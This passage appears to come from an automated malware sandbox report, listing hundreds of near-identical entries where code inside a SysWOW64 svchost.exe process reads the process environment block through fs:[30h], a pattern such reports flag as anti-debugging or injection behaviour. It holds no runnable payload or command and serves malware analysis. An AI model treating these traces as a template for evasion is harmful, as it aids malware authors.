            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F866E mov eax, dword ptr fs:[00000030h]2_2_036F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A660 mov eax, dword ptr fs:[00000030h]2_2_0366A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03662674 mov eax, dword ptr fs:[00000030h]2_2_03662674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364C640 mov eax, dword ptr fs:[00000030h]2_2_0364C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364E627 mov eax, dword ptr fs:[00000030h]2_2_0364E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03666620 mov eax, dword ptr fs:[00000030h]2_2_03666620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668620 mov eax, dword ptr fs:[00000030h]2_2_03668620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363262C mov eax, dword ptr fs:[00000030h]2_2_0363262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE609 mov eax, dword ptr fs:[00000030h]2_2_036AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364260B mov eax, dword ptr fs:[00000030h]2_2_0364260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672619 mov eax, dword ptr fs:[00000030h]2_2_03672619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE6F2 mov eax, dword ptr fs:[00000030h]2_2_036AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B06F1 mov eax, dword ptr fs:[00000030h]2_2_036B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A6C7 mov eax, dword ptr fs:[00000030h]2_2_0366A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C6A6 mov eax, dword ptr fs:[00000030h]2_2_0366C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036666B0 mov eax, dword ptr fs:[00000030h]2_2_036666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634690 mov eax, dword ptr fs:[00000030h]2_2_03634690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366656A mov eax, dword ptr fs:[00000030h]2_2_0366656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638550 mov eax, dword ptr fs:[00000030h]2_2_03638550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03640535 mov eax, dword ptr fs:[00000030h]2_2_03640535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E53E mov eax, dword ptr fs:[00000030h]2_2_0365E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6500 mov eax, dword ptr fs:[00000030h]2_2_036C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704500 mov eax, dword ptr fs:[00000030h]2_2_03704500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E5E7 mov eax, dword ptr fs:[00000030h]2_2_0365E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036325E0 mov eax, dword ptr fs:[00000030h]2_2_036325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C5ED mov eax, dword ptr fs:[00000030h]2_2_0366C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E5CF mov eax, dword ptr fs:[00000030h]2_2_0366E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036365D0 mov eax, dword ptr fs:[00000030h]2_2_036365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A5D0 mov eax, dword ptr fs:[00000030h]2_2_0366A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B05A7 mov eax, dword ptr fs:[00000030h]2_2_036B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036545B1 mov eax, dword ptr fs:[00000030h]2_2_036545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov eax, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03632582 mov ecx, dword ptr fs:[00000030h]2_2_03632582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03664588 mov eax, dword ptr fs:[00000030h]2_2_03664588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E59C mov eax, dword ptr fs:[00000030h]2_2_0366E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BC460 mov ecx, dword ptr fs:[00000030h]2_2_036BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365A470 mov eax, dword ptr fs:[00000030h]2_2_0365A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E443 mov eax, dword ptr fs:[00000030h]2_2_0366E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA456 mov eax, dword ptr fs:[00000030h]2_2_036EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362645D mov eax, dword ptr fs:[00000030h]2_2_0362645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365245A mov eax, dword ptr fs:[00000030h]2_2_0365245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362E420 mov eax, dword ptr fs:[00000030h]2_2_0362E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C427 mov eax, dword ptr fs:[00000030h]2_2_0362C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B6420 mov eax, dword ptr fs:[00000030h]2_2_036B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A430 mov eax, dword ptr fs:[00000030h]2_2_0366A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03668402 mov eax, dword ptr fs:[00000030h]2_2_03668402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036304E5 mov ecx, dword ptr fs:[00000030h]2_2_036304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036364AB mov eax, dword ptr fs:[00000030h]2_2_036364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036644B0 mov ecx, dword ptr fs:[00000030h]2_2_036644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA4B0 mov eax, dword ptr fs:[00000030h]2_2_036BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EA49A mov eax, dword ptr fs:[00000030h]2_2_036EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362CB7E mov eax, dword ptr fs:[00000030h]2_2_0362CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036E4B4B mov eax, dword ptr fs:[00000030h]2_2_036E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03702B57 mov eax, dword ptr fs:[00000030h]2_2_03702B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C6B40 mov eax, dword ptr fs:[00000030h]2_2_036C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FAB40 mov eax, dword ptr fs:[00000030h]2_2_036FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D8B42 mov eax, dword ptr fs:[00000030h]2_2_036D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03628B50 mov eax, dword ptr fs:[00000030h]2_2_03628B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DEB50 mov eax, dword ptr fs:[00000030h]2_2_036DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EB20 mov eax, dword ptr fs:[00000030h]2_2_0365EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F8B28 mov eax, dword ptr fs:[00000030h]2_2_036F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704B00 mov eax, dword ptr fs:[00000030h]2_2_03704B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AEB1D mov eax, dword ptr fs:[00000030h]2_2_036AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638BF0 mov eax, dword ptr fs:[00000030h]2_2_03638BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365EBFC mov eax, dword ptr fs:[00000030h]2_2_0365EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BCBF0 mov eax, dword ptr fs:[00000030h]2_2_036BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03650BCB mov eax, dword ptr fs:[00000030h]2_2_03650BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h]2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] | 2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630BCD mov eax, dword ptr fs:[00000030h] | 2_2_03630BCD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEBD0 mov eax, dword ptr fs:[00000030h] | 2_2_036DEBD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] | 2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640BBE mov eax, dword ptr fs:[00000030h] | 2_2_03640BBE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E4BB0 mov eax, dword ptr fs:[00000030h] | 2_2_036E4BB0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA6F mov eax, dword ptr fs:[00000030h] | 2_2_0366CA6F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DEA60 mov eax, dword ptr fs:[00000030h] | 2_2_036DEA60
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036ACA72 mov eax, dword ptr fs:[00000030h] | 2_2_036ACA72
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636A50 mov eax, dword ptr fs:[00000030h] | 2_2_03636A50
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] | 2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640A5B mov eax, dword ptr fs:[00000030h] | 2_2_03640A5B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA24 mov eax, dword ptr fs:[00000030h] | 2_2_0366CA24
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365EA2E mov eax, dword ptr fs:[00000030h] | 2_2_0365EA2E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] | 2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03654A35 mov eax, dword ptr fs:[00000030h] | 2_2_03654A35
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366CA38 mov eax, dword ptr fs:[00000030h] | 2_2_0366CA38
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BCA11 mov eax, dword ptr fs:[00000030h] | 2_2_036BCA11
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366AAEE mov eax, dword ptr fs:[00000030h] | 2_2_0366AAEE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] | 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] | 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686ACC mov eax, dword ptr fs:[00000030h] | 2_2_03686ACC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03630AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03630AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03664AD0 mov eax, dword ptr fs:[00000030h] | 2_2_03664AD0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638AA0 mov eax, dword ptr fs:[00000030h] | 2_2_03638AA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03686AA4 mov eax, dword ptr fs:[00000030h] | 2_2_03686AA4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363EA80 mov eax, dword ptr fs:[00000030h] | 2_2_0363EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704A80 mov eax, dword ptr fs:[00000030h] | 2_2_03704A80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03668A90 mov edx, dword ptr fs:[00000030h] | 2_2_03668A90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] | 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] | 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03656962 mov eax, dword ptr fs:[00000030h] | 2_2_03656962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] | 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov edx, dword ptr fs:[00000030h] | 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0367096E mov eax, dword ptr fs:[00000030h] | 2_2_0367096E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] | 2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4978 mov eax, dword ptr fs:[00000030h] | 2_2_036D4978
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC97C mov eax, dword ptr fs:[00000030h] | 2_2_036BC97C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0946 mov eax, dword ptr fs:[00000030h] | 2_2_036B0946
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704940 mov eax, dword ptr fs:[00000030h] | 2_2_03704940
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B892A mov eax, dword ptr fs:[00000030h] | 2_2_036B892A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C892B mov eax, dword ptr fs:[00000030h] | 2_2_036C892B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] | 2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE908 mov eax, dword ptr fs:[00000030h] | 2_2_036AE908
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BC912 mov eax, dword ptr fs:[00000030h] | 2_2_036BC912
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] | 2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628918 mov eax, dword ptr fs:[00000030h] | 2_2_03628918
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036BE9E0 mov eax, dword ptr fs:[00000030h] | 2_2_036BE9E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] | 2_2_036629F9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036629F9 mov eax, dword ptr fs:[00000030h] | 2_2_036629F9
